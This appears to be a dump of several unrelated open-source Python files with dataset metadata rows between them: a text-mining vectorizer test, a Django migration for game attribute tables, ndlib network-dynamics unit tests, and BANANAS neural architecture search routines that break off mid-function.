    check('test_vectorizer_dependencyPathEdgesNearEntities_noTFIDF_1', namedCols1)

    colmeans2 = np.sum(matrix1, axis=0).tolist()[0]
    namedCols2 = {col: round(v, 8) for col, v in zip(colnames, colmeans2)}
    check('test_vectorizer_dependencyPathEdgesNearEntities_noTFIDF_2', namedCols2)

def test_vectorizer_defaults_triple():
    corpus1, _ = generateTestData(entityCount=3, positiveCount=5, negativeCount=5)
    corpus2, _ = generateTestData(entityCount=3, positiveCount=10, negativeCount=10)

    parser = kindred.Parser()
    parser.parse(corpus1)
    parser.parse(corpus2)

    candidateBuilder = kindred.CandidateBuilder(entityCount=3)
    candidateRelations1 = candidateBuilder.build(corpus1)
    candidateRelations2 = candidateBuilder.build(corpus2)

    vectorizer = kindred.Vectorizer(entityCount=3)
    matrix1 = vectorizer.fit_transform(candidateRelations1)
    matrix2 = vectorizer.transform(candidateRelations2)

    colnames = vectorizer.getFeatureNames()

    # As a quick check, we'll confirm that the column means are as expected
    colmeans1 = np.sum(matrix1, axis=0).tolist()[0]
    namedCols1 = {col: round(v, 8) for col, v in zip(colnames, colmeans1)}
    check('test_vectorizer_defaults_triple_1', namedCols1)

    colmeans2 = np.sum(matrix1, axis=0).tolist()[0]
    namedCols2 = {col: round(v, 8) for col, v in zip(colnames, colmeans2)}
    check('test_vectorizer_defaults_triple_2', namedCols2)

if __name__ == '__main__':
    test_vectorizer_defaults_triple()
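# These tests can also be run with pytest (assuming kindred and its parser
# models are installed), e.g.:
#
#     pytest tests/test_vectorizer.py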
# metadrive/component/road_network/__init__.py (repo: liuzuxin/metadrive, license: Apache-2.0)
from metadrive.component.road_network.road import Road, Route
from metadrive.component.road_network.node_road_network import NodeRoadNetwork
eaa52882968092b1a73da08c50be7d2d34357226 | 14 | py | Python | topics/topic_1/degree_of_two.py | VladBaryliuk/my_trainings | 10c4bf2147c361ab918c591577a076b0d276ede0 | [
"Apache-2.0"
] | null | null | null | topics/topic_1/degree_of_two.py | VladBaryliuk/my_trainings | 10c4bf2147c361ab918c591577a076b0d276ede0 | [
"Apache-2.0"
] | null | null | null | topics/topic_1/degree_of_two.py | VladBaryliuk/my_trainings | 10c4bf2147c361ab918c591577a076b0d276ede0 | [
"Apache-2.0"
] | null | null | null | print(2**179)
| 7 | 13 | 0.642857 | 3 | 14 | 3 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.307692 | 0.071429 | 14 | 1 | 14 | 14 | 0.384615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
eaf89183e1d467003ef16b9c5856ffd54a262e86 | 8,333 | py | Python | demo/worlddata/migrations/0006_auto_20170714_1430.py | MarsZone/DreamLand | 87455f421c1ba09cb6efd5fc0882fbc2a29ea1a5 | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null | demo/worlddata/migrations/0006_auto_20170714_1430.py | MarsZone/DreamLand | 87455f421c1ba09cb6efd5fc0882fbc2a29ea1a5 | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null | demo/worlddata/migrations/0006_auto_20170714_1430.py | MarsZone/DreamLand | 87455f421c1ba09cb6efd5fc0882fbc2a29ea1a5 | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.9.13 on 2017-07-14 06:30
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('worlddata', '0005_foods_hunger'),
]
operations = [
migrations.CreateModel(
name='character_attributes_info',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('field', models.CharField(max_length=255, unique=True)),
('key', models.CharField(blank=True, max_length=255)),
('name', models.CharField(blank=True, max_length=255)),
('desc', models.TextField(blank=True)),
],
options={
'abstract': False,
'verbose_name': 'Character Attribute Information',
'verbose_name_plural': 'Character Attribute Information',
},
),
migrations.CreateModel(
name='equipment_attributes_info',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('field', models.CharField(max_length=255, unique=True)),
('key', models.CharField(blank=True, max_length=255)),
('name', models.CharField(blank=True, max_length=255)),
('desc', models.TextField(blank=True)),
],
options={
'abstract': False,
'verbose_name': 'Equipment Attribute Information',
'verbose_name_plural': 'Equipment Attribute Information',
},
),
migrations.CreateModel(
name='food_attributes_info',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('field', models.CharField(max_length=255, unique=True)),
('key', models.CharField(blank=True, max_length=255)),
('name', models.CharField(blank=True, max_length=255)),
('desc', models.TextField(blank=True)),
],
options={
'abstract': False,
'verbose_name': 'Food Attribute Information',
'verbose_name_plural': 'Food Attribute Information',
},
),
migrations.RemoveField(
model_name='character_models',
name='attack',
),
migrations.RemoveField(
model_name='character_models',
name='defence',
),
migrations.RemoveField(
model_name='character_models',
name='max_mp',
),
migrations.RemoveField(
model_name='equipments',
name='attack',
),
migrations.RemoveField(
model_name='equipments',
name='defence',
),
migrations.RemoveField(
model_name='foods',
name='hp',
),
migrations.RemoveField(
model_name='foods',
name='hunger',
),
migrations.RemoveField(
model_name='foods',
name='mp',
),
migrations.AddField(
model_name='character_models',
name='attr_1',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='character_models',
name='attr_10',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='character_models',
name='attr_2',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='character_models',
name='attr_3',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='character_models',
name='attr_4',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='character_models',
name='attr_5',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='character_models',
name='attr_6',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='character_models',
name='attr_7',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='character_models',
name='attr_8',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='character_models',
name='attr_9',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='equipments',
name='attr_1',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='equipments',
name='attr_10',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='equipments',
name='attr_2',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='equipments',
name='attr_3',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='equipments',
name='attr_4',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='equipments',
name='attr_5',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='equipments',
name='attr_6',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='equipments',
name='attr_7',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='equipments',
name='attr_8',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='equipments',
name='attr_9',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='foods',
name='attr_1',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='foods',
name='attr_10',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='foods',
name='attr_2',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='foods',
name='attr_3',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='foods',
name='attr_4',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='foods',
name='attr_5',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='foods',
name='attr_6',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='foods',
name='attr_7',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='foods',
name='attr_8',
field=models.CharField(blank=True, max_length=80),
),
migrations.AddField(
model_name='foods',
name='attr_9',
field=models.CharField(blank=True, max_length=80),
),
]
| 34.292181 | 114 | 0.533781 | 778 | 8,333 | 5.521851 | 0.104113 | 0.136173 | 0.167598 | 0.201117 | 0.926676 | 0.879888 | 0.826117 | 0.791899 | 0.782123 | 0.782123 | 0 | 0.025791 | 0.343934 | 8,333 | 242 | 115 | 34.433884 | 0.760015 | 0.00816 | 0 | 0.897872 | 1 | 0 | 0.129145 | 0.006052 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.008511 | 0 | 0.021277 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
f49c5fb0527c6cbc6568a90e6187de606b0dbf85 | 4,930 | py | Python | ndlib/test/test_action_dynamic.py | vahidmoeinifar/ndlib | c55a65b4f0ed2928cf36f4e2b33d872d33e734ba | [
"BSD-2-Clause"
] | null | null | null | ndlib/test/test_action_dynamic.py | vahidmoeinifar/ndlib | c55a65b4f0ed2928cf36f4e2b33d872d33e734ba | [
"BSD-2-Clause"
] | null | null | null | ndlib/test/test_action_dynamic.py | vahidmoeinifar/ndlib | c55a65b4f0ed2928cf36f4e2b33d872d33e734ba | [
"BSD-2-Clause"
] | null | null | null | from __future__ import absolute_import
import unittest
import networkx as nx
import ndlib.models.ModelConfig as mc
import ndlib.models.CompositeModel as gc
import ndlib.models.compartments as cmp
import ndlib.models.actions as act
__author__ = 'Giulio Rossetti'
__license__ = "BSD-2-Clause"
__email__ = "giulio.rossetti@gmail.com"
class NdlibActionDynamicTest(unittest.TestCase):
def test_compartment_add_node(self):
g = nx.karate_club_graph()
attr = {n: {"even": int(n % 2)} for n in g.nodes()}
nx.set_node_attributes(g, attr)
model = gc.CompositeModel(g)
model.add_status("Susceptible")
model.add_status("Infected")
a1 = act.AddNode(probability=1, initial_status="Susceptible", copy_attributes=True)
c1 = cmp.NodeStochastic(1)
model.add_rule("Susceptible", "Susceptible", c1)
model.add_action(a1)
config = mc.Configuration()
config.add_model_parameter('percentage_infected', 0)
model.set_initial_status(config)
iterations = model.iteration_bunch(6)
nodes = [sum(n['node_count'].values()) for n in iterations]
self.assertEqual(nodes, [35, 36, 37, 38, 39, 40])
def test_compartment_swap_edge(self):
g = nx.karate_club_graph()
attr = {(u, v): {"even": int((u + v) % 10)} for (u, v) in g.edges()}
nx.set_edge_attributes(g, attr)
model = gc.CompositeModel(g)
model.add_status("Susceptible")
model.add_status("Infected")
a1 = act.SwapEdges(probability=1, number_of_swaps=1, copy_attributes=True, initial_status="Susceptible")
c1 = cmp.NodeStochastic(0.5)
model.add_rule("Susceptible", "Susceptible", c1)
model.add_action(a1)
config = mc.Configuration()
config.add_model_parameter('percentage_infected', 0)
model.set_initial_status(config)
iterations = model.iteration_bunch(6)
self.assertEqual(len(iterations), 6)
def test_compartment_remove_node(self):
g = nx.karate_club_graph()
model = gc.CompositeModel(g)
model.add_status("Susceptible")
model.add_status("Infected")
a1 = act.RemoveNode(probability=1)
c1 = cmp.NodeStochastic(0.5)
model.add_rule("Susceptible", "Susceptible", c1)
model.add_action(a1)
config = mc.Configuration()
config.add_model_parameter('percentage_infected', 0)
model.set_initial_status(config)
iterations = model.iteration_bunch(6)
nodes = [sum(n['node_count'].values()) for n in iterations]
self.assertEqual(nodes, [33, 32, 31, 30, 29, 28])
def test_compartment_add_node_pa(self):
g = nx.karate_club_graph()
attr = {n: {"even": int(n % 2)} for n in g.nodes()}
nx.set_node_attributes(g, attr)
model = gc.CompositeModel(g)
model.add_status("Susceptible")
model.add_status("Infected")
a1 = act.AddNode(probability=1, initial_status="Susceptible", copy_attributes=True,
number_of_edges=4, model='PA')
c1 = cmp.NodeStochastic(1)
model.add_rule("Susceptible", "Susceptible", c1)
model.add_action(a1)
config = mc.Configuration()
config.add_model_parameter('percentage_infected', 0)
model.set_initial_status(config)
iterations = model.iteration_bunch(6)
nodes = [sum(n['node_count'].values()) for n in iterations]
self.assertEqual(nodes, [35, 36, 37, 38, 39, 40])
def test_compartment_remove_node_top(self):
g = nx.karate_club_graph()
model = gc.CompositeModel(g)
model.add_status("Susceptible")
model.add_status("Infected")
a1 = act.RemoveNode(probability=1, model="top")
c1 = cmp.NodeStochastic(0.5)
model.add_rule("Susceptible", "Susceptible", c1)
model.add_action(a1)
config = mc.Configuration()
config.add_model_parameter('percentage_infected', 0)
model.set_initial_status(config)
iterations = model.iteration_bunch(6)
nodes = [sum(n['node_count'].values()) for n in iterations]
self.assertEqual(nodes, [33, 32, 31, 30, 29, 28])
def test_compartment_remove_node_bottom(self):
g = nx.karate_club_graph()
model = gc.CompositeModel(g)
model.add_status("Susceptible")
model.add_status("Infected")
a1 = act.RemoveNode(probability=1, model="bottom")
c1 = cmp.NodeStochastic(0.5)
model.add_rule("Susceptible", "Susceptible", c1)
model.add_action(a1)
config = mc.Configuration()
config.add_model_parameter('percentage_infected', 0)
model.set_initial_status(config)
iterations = model.iteration_bunch(6)
nodes = [sum(n['node_count'].values()) for n in iterations]
self.assertEqual(nodes, [33, 32, 31, 30, 29, 28]) | 32.012987 | 112 | 0.645233 | 616 | 4,930 | 4.951299 | 0.175325 | 0.062951 | 0.055082 | 0.025574 | 0.839672 | 0.816066 | 0.816066 | 0.804918 | 0.804918 | 0.804918 | 0 | 0.031696 | 0.232049 | 4,930 | 154 | 113 | 32.012987 | 0.773904 | 0 | 0 | 0.747664 | 0 | 0 | 0.10505 | 0.00507 | 0 | 0 | 0 | 0 | 0.056075 | 1 | 0.056075 | false | 0 | 0.065421 | 0 | 0.130841 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f4f7ca4b49a6359ba9a20de24ee8c17d9ff51f82 | 27,803 | py | Python | nas_lib/algos/bananas.py | auroua/NPENASv1 | 1a293e50779ccc49456dc905fa989e4778c027a2 | [
"MIT"
] | 4 | 2020-09-30T04:38:45.000Z | 2022-03-18T10:57:54.000Z | nas_lib/algos/bananas.py | auroua/NPENASv1 | 1a293e50779ccc49456dc905fa989e4778c027a2 | [
"MIT"
] | null | null | null | nas_lib/algos/bananas.py | auroua/NPENASv1 | 1a293e50779ccc49456dc905fa989e4778c027a2 | [
"MIT"
] | 1 | 2021-01-27T09:27:21.000Z | 2021-01-27T09:27:21.000Z | import numpy as np
from .acquisition_functions import acq_fn
from ..models.meta_neural_net import MetaNeuralnet
import tensorflow as tf
from keras import backend as K
import copy
from nas_lib.utils.corr import get_kendalltau_coorlection
def bananas_case1(search_space,
metann_params,
num_init=10,
k=10,
total_queries=150,
num_ensemble=5,
acq_opt_type='mutation',
explore_type='its',
encode_paths=True,
allow_isomorphisms=False,
deterministic=True,
verbose=1,
gpu=None,
logger=None,
candidate_nums=100):
"""
Bayesian optimization with a neural network model
"""
data = search_space.generate_random_dataset(num=num_init,
encode_paths=encode_paths,
allow_isomorphisms=allow_isomorphisms,
deterministic_loss=deterministic)
query = num_init + k
while query <= total_queries:
xtrain = np.array([d[1] for d in data])
ytrain = np.array([d[2] for d in data])
candidates = search_space.get_candidates(data,
num=candidate_nums,
acq_opt_type=acq_opt_type,
encode_paths=encode_paths,
allow_isomorphisms=allow_isomorphisms,
deterministic_loss=deterministic)
xcandidates = np.array([c[1] for c in candidates])
predictions = []
train_error = 0
for _ in range(num_ensemble):
if gpu is not None:
meta_neuralnet = MetaNeuralnet(gpu=gpu)
else:
meta_neuralnet = MetaNeuralnet()
train_error += meta_neuralnet.fit(xtrain, ytrain, **metann_params)
predictions.append(np.squeeze(meta_neuralnet.predict(xcandidates)))
K.clear_session()
tf.reset_default_graph()
del meta_neuralnet
train_error /= num_ensemble
if verbose:
logger.info('Query {}, Meta neural net train error: {}'.format(query, train_error))
sorted_indices = acq_fn(predictions, explore_type)
for i in sorted_indices[:k]:
archtuple = search_space.query_arch(candidates[i][0],
encode_paths=encode_paths,
deterministic=deterministic)
data.append(archtuple)
if verbose:
top_5_loss = sorted([d[2] for d in data])[:min(5, len(data))]
logger.info('Query {}, top 5 val losses {}'.format(query, top_5_loss))
query += k
return data
def bananas_case2(search_space,
metann_params,
num_init=10,
k=10,
total_queries=150,
num_ensemble=5,
acq_opt_type='mutation',
explore_type='its',
encode_paths=True,
allow_isomorphisms=False,
deterministic=True,
verbose=1,
gpu=None,
logger=None,
candidate_nums=100,
record_kt='F',
record_mutation='F'
):
"""
Bayesian optimization with a neural network model
"""
data = search_space.generate_random_dataset(num=num_init,
encode_paths=encode_paths,
allow_isomorphisms=allow_isomorphisms,
deterministic_loss=deterministic)
query = num_init + k
kt_list = []
kt_top_list = []
mutate_list = []
if encode_paths:
type = 'bananas'
else:
type = 'bananas_f'
while query <= total_queries:
xtrain = np.array([d[3] for d in data])
ytrain = np.array([d[4] for d in data])
if record_mutation == 'T':
candidates, dist_list, replicate_num, mutated_nums_list, mutated_arch_list \
= search_space.get_candidates(data,
num=candidate_nums,
acq_opt_type=acq_opt_type,
encode_paths=encode_paths,
allow_isomorphisms=allow_isomorphisms,
deterministic_loss=deterministic,
return_dist=True)
cand_val_list = [cand[4] for cand in candidates]
mutate_list.append((dist_list, replicate_num, mutated_nums_list, mutated_arch_list, cand_val_list))
else:
candidates = search_space.get_candidates(data,
num=candidate_nums,
acq_opt_type=acq_opt_type,
encode_paths=encode_paths,
allow_isomorphisms=allow_isomorphisms,
deterministic_loss=deterministic)
xcandidates = np.array([c[3] for c in candidates])
predictions = []
train_error = 0
for _ in range(num_ensemble):
if gpu is not None:
meta_neuralnet = MetaNeuralnet(gpu=gpu)
else:
meta_neuralnet = MetaNeuralnet()
train_error += meta_neuralnet.fit(xtrain, ytrain, **metann_params)
predictions.append(np.squeeze(meta_neuralnet.predict(xcandidates)))
K.clear_session()
tf.reset_default_graph()
del meta_neuralnet
train_error /= num_ensemble
if verbose:
logger.info('Query {}, Meta neural net train error: {}'.format(query, train_error))
samples = None
if record_kt == 'T':
sorted_indices, samples = acq_fn(predictions, explore_type, get_samples=True)
candidates_gt = [can[4] for can in candidates]
kt = get_kendalltau_coorlection(samples.tolist(), candidates_gt)[0]
kt_list.append(kt)
else:
sorted_indices = acq_fn(predictions, explore_type)
kt_top_pred_list = []
kt_top_gt_list = []
for i in sorted_indices[:k]:
archtuple = search_space.query_arch(matrix=candidates[i][1],
ops=candidates[i][2],
encode_paths=encode_paths,
deterministic=deterministic)
data.append(archtuple)
if samples is not None:
kt_top_pred_list.append(samples[i])
kt_top_gt_list.append(archtuple[4])
if samples is not None:
kt_top_list.append(get_kendalltau_coorlection(kt_top_pred_list, kt_top_gt_list)[0])
if verbose:
top_5_loss = sorted([d[4] for d in data])[:min(5, len(data))]
logger.info('Query {}, top 5 val losses {}'.format(query, top_5_loss))
query += k
return data, {'type': type, 'final_data': data, 'kt_list': kt_list, 'kt_top_list': kt_top_list,
'mutate_list': mutate_list}
def bananas_nasbench_201(search_space,
metann_params,
num_init=10,
k=10,
total_queries=150,
num_ensemble=5,
acq_opt_type='mutation',
explore_type='its',
encode_paths=True,
allow_isomorphisms=False,
deterministic=True,
verbose=1,
gpu=None,
logger=None,
eva_new=True,
candidate_nums=100,
record_kt='F',
record_mutation='F'
):
"""
Bayesian optimization with a neural network model
"""
data = search_space.generate_random_dataset(num=num_init,
allow_isomorphisms=allow_isomorphisms,
deterministic_loss=deterministic)
query = num_init + k
kt_list = []
kt_top_list = []
mutate_list = []
if encode_paths:
type = 'bananas'
else:
type = 'bananas_f'
while query <= total_queries:
if encode_paths:
xtrain = np.array([d[3] for d in data])
else:
xtrain = np.array([d[7] for d in data])
ytrain = np.array([d[4] for d in data])
if record_mutation == 'T':
candidates, dist_list, replicate_num, mutated_nums_list, mutated_arch_list \
= search_space.get_candidates(data,
num=candidate_nums,
allow_isomorphisms=allow_isomorphisms,
return_dist=True
)
cand_val_list = [cand[4] for cand in candidates]
mutate_list.append((dist_list, replicate_num, mutated_nums_list, mutated_arch_list, cand_val_list))
else:
candidates = search_space.get_candidates(data,
num=candidate_nums,
allow_isomorphisms=allow_isomorphisms
)
if encode_paths:
xcandidates = np.array([c[3] for c in candidates])
else:
xcandidates = np.array([c[7] for c in candidates])
predictions = []
train_error = 0
for _ in range(num_ensemble):
if gpu is not None:
meta_neuralnet = MetaNeuralnet(gpu=gpu)
else:
meta_neuralnet = MetaNeuralnet()
train_error += meta_neuralnet.fit(xtrain, ytrain, **metann_params)
predictions.append(np.squeeze(meta_neuralnet.predict(xcandidates)))
K.clear_session()
tf.reset_default_graph()
del meta_neuralnet
train_error /= num_ensemble
if verbose:
logger.info('Query {}, Meta neural net train error: {}'.format(query, train_error))
samples = None
if record_kt == 'T':
sorted_indices, samples = acq_fn(predictions, explore_type, get_samples=True)
candidates_gt = [can[4] for can in candidates]
kt = get_kendalltau_coorlection(samples.tolist(), candidates_gt)[0]
kt_list.append(kt)
else:
sorted_indices = acq_fn(predictions, explore_type)
kt_top_pred_list = []
kt_top_gt_list = []
for i in sorted_indices[:k]:
archtuple = candidates[i]
data.append(archtuple)
if samples is not None:
kt_top_pred_list.append(samples[i])
kt_top_gt_list.append(archtuple[4])
if samples is not None:
kt_top_list.append(get_kendalltau_coorlection(kt_top_pred_list, kt_top_gt_list)[0])
if verbose:
top_5_loss = sorted([d[4] for d in data])[:min(5, len(data))]
logger.info('Query {}, top 5 val losses {}'.format(query, top_5_loss))
query += k
return data, {'type': type, 'final_data': data, 'kt_list': kt_list, 'kt_top_list': kt_top_list,
'mutate_list': mutate_list}
def bananas_diff_training_nums_case1(search_space,
metann_params,
num_init=10,
k=10,
total_queries=150,
num_ensemble=5,
acq_opt_type='mutation',
explore_type='its',
encode_paths=True,
allow_isomorphisms=False,
deterministic=True,
verbose=1,
gpu=None,
logger=None,
candidate_nums=100,
training_nums=150):
data = search_space.generate_random_dataset(num=num_init,
encode_paths=encode_paths,
allow_isomorphisms=allow_isomorphisms,
deterministic_loss=deterministic)
query = num_init + k
train_data = []
while query <= total_queries:
if len(train_data) < training_nums:
train_data = copy.deepcopy(data)
candidates = search_space.get_candidates(data,
num=candidate_nums,
acq_opt_type=acq_opt_type,
encode_paths=encode_paths,
allow_isomorphisms=allow_isomorphisms,
deterministic_loss=deterministic)
xcandidates = np.array([c[1] for c in candidates])
predictions = []
train_error = 0
xtrain = np.array([d[1] for d in train_data])
ytrain = np.array([d[2] for d in train_data])
for _ in range(num_ensemble):
if gpu is not None:
meta_neuralnet = MetaNeuralnet(gpu=gpu)
else:
meta_neuralnet = MetaNeuralnet()
train_error += meta_neuralnet.fit(xtrain, ytrain, **metann_params)
predictions.append(np.squeeze(meta_neuralnet.predict(xcandidates)))
K.clear_session()
tf.reset_default_graph()
del meta_neuralnet
train_error /= num_ensemble
if verbose:
logger.info('Query {}, Meta neural net train error: {}'.format(query, train_error))
sorted_indices = acq_fn(predictions, explore_type)
for i in sorted_indices[:k]:
archtuple = search_space.query_arch(candidates[i][0],
encode_paths=encode_paths,
deterministic=deterministic)
data.append(archtuple)
if verbose:
top_5_loss = sorted([d[2] for d in data])[:min(5, len(data))]
logger.info('Query {}, training data nums {}, top 5 val losses {}'.format(query, len(train_data),
top_5_loss))
query += k
return data
def bananas_training_num_diff_case2(search_space,
metann_params,
num_init=10,
k=10,
total_queries=150,
num_ensemble=5,
acq_opt_type='mutation',
explore_type='its',
encode_paths=True,
allow_isomorphisms=False,
deterministic=True,
verbose=1,
gpu=None,
logger=None,
candidate_nums=100,
training_nums=150):
data = search_space.generate_random_dataset(num=num_init,
encode_paths=encode_paths,
allow_isomorphisms=allow_isomorphisms,
deterministic_loss=deterministic)
query = num_init + k
train_data = []
while query <= total_queries:
if len(train_data) < training_nums:
train_data = copy.deepcopy(data)
xtrain = np.array([d[3] for d in train_data])
ytrain = np.array([d[4] for d in train_data])
candidates = search_space.get_candidates(data,
num=candidate_nums,
acq_opt_type=acq_opt_type,
encode_paths=encode_paths,
allow_isomorphisms=allow_isomorphisms,
deterministic_loss=deterministic)
xcandidates = np.array([c[3] for c in candidates])
predictions = []
train_error = 0
for _ in range(num_ensemble):
if gpu is not None:
meta_neuralnet = MetaNeuralnet(gpu=gpu)
else:
meta_neuralnet = MetaNeuralnet()
train_error += meta_neuralnet.fit(xtrain, ytrain, **metann_params)
predictions.append(np.squeeze(meta_neuralnet.predict(xcandidates)))
K.clear_session()
tf.reset_default_graph()
del meta_neuralnet
train_error /= num_ensemble
if verbose:
logger.info('Query {}, Meta neural net train error: {}'.format(query, train_error))
sorted_indices = acq_fn(predictions, explore_type)
for i in sorted_indices[:k]:
archtuple = search_space.query_arch(matrix=candidates[i][1],
ops=candidates[i][2],
encode_paths=encode_paths,
deterministic=deterministic)
data.append(archtuple)
if verbose:
top_5_loss = sorted([d[4] for d in data])[:min(5, len(data))]
logger.info('Query {}, training data nums {}, top 5 val losses {}'.format(query, len(train_data),
top_5_loss))
query += k
return data
def bananas_nasbench_nlp(search_space,
metann_params,
num_init=10,
k=10,
total_queries=150,
num_ensemble=5,
acq_opt_type='mutation',
explore_type='its',
encode_paths=True,
allow_isomorphisms=False,
deterministic=True,
verbose=1,
gpu=None,
logger=None,
eva_new=True,
candidate_nums=100,
mutation_rate=0.3,
record_kt='F',
record_mutation='F'
):
"""
Bayesian optimization with a neural network model
"""
data = search_space.generate_random_dataset(num=num_init,
allow_isomorphisms=allow_isomorphisms,
deterministic_loss=deterministic)
query = num_init + k
kt_list = []
kt_top_list = []
mutate_list = []
if encode_paths:
type = 'bananas'
else:
type = 'bananas_f'
while query <= total_queries:
if encode_paths:
xtrain = np.array([d[3] for d in data])
else:
xtrain = np.array([d[7] for d in data])
ytrain = np.array([d[4] for d in data])
if record_mutation == 'T':
candidates, dist_list, replicate_num, mutated_nums_list, mutated_arch_list \
= search_space.get_candidates(data,
num=candidate_nums,
allow_isomorphisms=allow_isomorphisms,
mutation_rate=mutation_rate,
return_dist=True
)
cand_val_list = [cand[4] for cand in candidates]
mutate_list.append((dist_list, replicate_num, mutated_nums_list, mutated_arch_list, cand_val_list))
else:
candidates = search_space.get_candidates(data,
num=candidate_nums,
allow_isomorphisms=allow_isomorphisms,
mutation_rate=mutation_rate
)
if encode_paths:
xcandidates = np.array([c[3] for c in candidates])
else:
xcandidates = np.array([c[7] for c in candidates])
predictions = []
train_error = 0
for _ in range(num_ensemble):
if gpu is not None:
meta_neuralnet = MetaNeuralnet(gpu=gpu)
else:
meta_neuralnet = MetaNeuralnet()
train_error += meta_neuralnet.fit(xtrain, ytrain, **metann_params)
predictions.append(np.squeeze(meta_neuralnet.predict(xcandidates)))
K.clear_session()
tf.reset_default_graph()
del meta_neuralnet
train_error /= num_ensemble
if verbose:
logger.info('Query {}, Meta neural net train error: {}'.format(query, train_error))
samples = None
if record_kt == 'T':
sorted_indices, samples = acq_fn(predictions, explore_type, get_samples=True)
candidates_gt = [can[4] for can in candidates]
kt = get_kendalltau_coorlection(samples.tolist(), candidates_gt)[0]
kt_list.append(kt)
else:
sorted_indices = acq_fn(predictions, explore_type)
kt_top_pred_list = []
kt_top_gt_list = []
for i in sorted_indices[:k]:
archtuple = candidates[i]
data.append(archtuple)
if samples is not None:
kt_top_pred_list.append(samples[i])
kt_top_gt_list.append(archtuple[4])
if samples is not None:
kt_top_list.append(get_kendalltau_coorlection(kt_top_pred_list, kt_top_gt_list)[0])
if verbose:
top_5_loss = sorted([d[4] for d in data])[:min(5, len(data))]
logger.info('Query {}, top 5 val losses {}'.format(query, top_5_loss))
query += k
return data, {'type': type, 'final_data': data, 'kt_list': kt_list, 'kt_top_list': kt_top_list,
'mutate_list': mutate_list}
def bananas_nasbench_asr(search_space,
metann_params,
num_init=10,
k=10,
total_queries=150,
num_ensemble=5,
acq_opt_type='mutation',
explore_type='its',
encode_paths=True,
allow_isomorphisms=False,
deterministic=True,
verbose=1,
gpu=None,
logger=None,
eva_new=True,
candidate_nums=100,
mutation_rate=-1,
record_kt='F',
record_mutation='F'
):
"""
Bayesian optimization with a neural network model
"""
data = search_space.generate_random_dataset(num=num_init,
allow_isomorphisms=allow_isomorphisms,
deterministic_loss=deterministic)
query = num_init + k
kt_list = []
kt_top_list = []
mutate_list = []
if encode_paths:
type = 'bananas'
else:
type = 'bananas_f'
while query <= total_queries:
if encode_paths:
xtrain = np.array([d[3] for d in data])
else:
xtrain = np.array([d[7] for d in data])
ytrain = np.array([d[4] for d in data])
if record_mutation == 'T':
candidates, dist_list, replicate_num, mutated_nums_list, mutated_arch_list \
= search_space.get_candidates(data,
num=candidate_nums,
allow_isomorphisms=allow_isomorphisms,
mutation_rate=mutation_rate,
return_dist=True
)
cand_val_list = [cand[4] for cand in candidates]
mutate_list.append((dist_list, replicate_num, mutated_nums_list, mutated_arch_list, cand_val_list))
else:
candidates = search_space.get_candidates(data,
num=candidate_nums,
